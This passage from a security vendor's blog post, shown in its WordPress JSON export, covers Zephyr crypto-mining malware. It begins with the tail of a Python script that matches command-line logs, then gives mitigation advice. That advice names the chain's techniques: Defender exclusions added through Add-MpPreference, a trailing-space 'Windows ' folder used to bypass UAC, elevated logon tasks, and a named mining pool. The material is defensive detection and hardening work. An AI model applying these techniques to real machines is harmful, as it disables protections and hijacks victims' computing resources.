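    return {eid: [f.rule for f in classify(cmd)] for eid, cmd in events if classify(cmd)}


if __name__ == "__main__":
    for eid, rules in scan(SAMPLE_EVENTS).items():
        print(eid, rules)
```

Each stage of the chain is visible in a single command line, which is why command-line logging is the cheapest source for this family; the two benign events show that the rules key on specifics (a trailing-space component, a non-DLL ServiceDll, a pool-plus-wallet pair) rather than on svchost.exe or quoted paths in general.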
This behaviour is indicative of a broader trend of malware that exploits system resources for financial gain.\n<h2><strong>Mitigation<\/strong><\/h2>\nTo mitigate the risk of malware that exploits system resources for cryptocurrency mining, several proactive measures should be taken.\n<ul>\n \t<li>Keep operating systems and applications patched, so that loaders cannot rely on known vulnerabilities for initial access or elevation.<\/li>\n \t<li>Run anti-virus software with real-time protection and periodic scans, and alert on changes to its configuration: each Add-MpPreference exclusion in this chain is logged by Microsoft Defender as Event ID 5007 in the Microsoft-Windows-Windows Defender\/Operational log, and a new exclusion covering System32 or an entire drive root should be treated as an incident, not as a tuning decision.<\/li>\n \t<li>Limit administrative privileges. Adding Defender exclusions, creating services and registering tasks with \/rl HIGHEST all need an elevated context, and UAC-bypass tricks such as the mock trusted directory only help accounts that are already members of the Administrators group; a standard user account cannot complete this chain.<\/li>\n \t<li>Hunt for the artefacts specific to this family: a directory named &#8220;Windows &#8221; with a trailing space on the system drive, a service whose ServiceDll points at a .dat file, a logon task that runs an executable from System32 with the highest privileges, and sustained CPU usage pinned near a fixed cap such as 50%.<\/li>\n \t<li>Configure firewalls and DNS filtering to block outbound connections to known mining pools (here zeph.2miners.com on port 2222), and review egress to unusual ports in general.<\/li>\n<\/ul>\nTogether, these strategies significantly strengthen an organization&#8217;s defence against cryptocurrency mining malware.\n<h2><strong>Quick Heal Detection<\/strong><\/h2>\n<a href=\"https:\/\/www.quickheal.co.in\/home-users\/quick-heal-antivirus-pro\">Quick Heal Antivirus<\/a> detects all variants of this crypto mining malware, both PE and non-PE files, through static and dynamic analysis, ensuring immediate identification of the components responsible for the mining activity.\n<h3>IOCs<\/h3>\n<a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2024\/12\/Zephyr-CryptoMiner-IOCs.xlsx\">Zephyr Miner IOCs<\/a>\n\nALSO READ:\u00a0<a href=\"https:\/\/blogs.quickheal.com\/proactive-measures-to-safeguard-against-the-ransomware-menace\/\">Proactive Measures to Safeguard against the Ransomware Menace<\/a>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Crypto Mining Crypto mining is the process by which individuals or organizations use 
computer power to solve complex mathematical problems, validating transactions on a blockchain network and earning cryptocurrency coins. This activity has gained popularity with the increasing value of digital currencies, leading some malicious actors to exploit users\u2019 devices for their own gain. Cybercriminals [&hellip;]<\/p>\n","protected":false},"author":104,"featured_media":93072,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1653,1613,1672,24,1],"tags":[2040,2045,1614,1568,49],"class_list":["post-93017","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-antivirus","category-cryptojacking","category-cryptomining","category-malware","category-uncategorized","tag-quickheal-cybersecurity-cyberawareness","tag-zephyr-coin","tag-crypto-mining","tag-cryptojacking","tag-malware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/93017"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/104"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=93017"}],"version-history":[{"count":3,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/93017\/revisions"}],"predecessor-version":[{"id":93075,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/93017\/revisions\/93075"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/93072"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=93017"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v
2\/categories?post=93017"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=93017"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}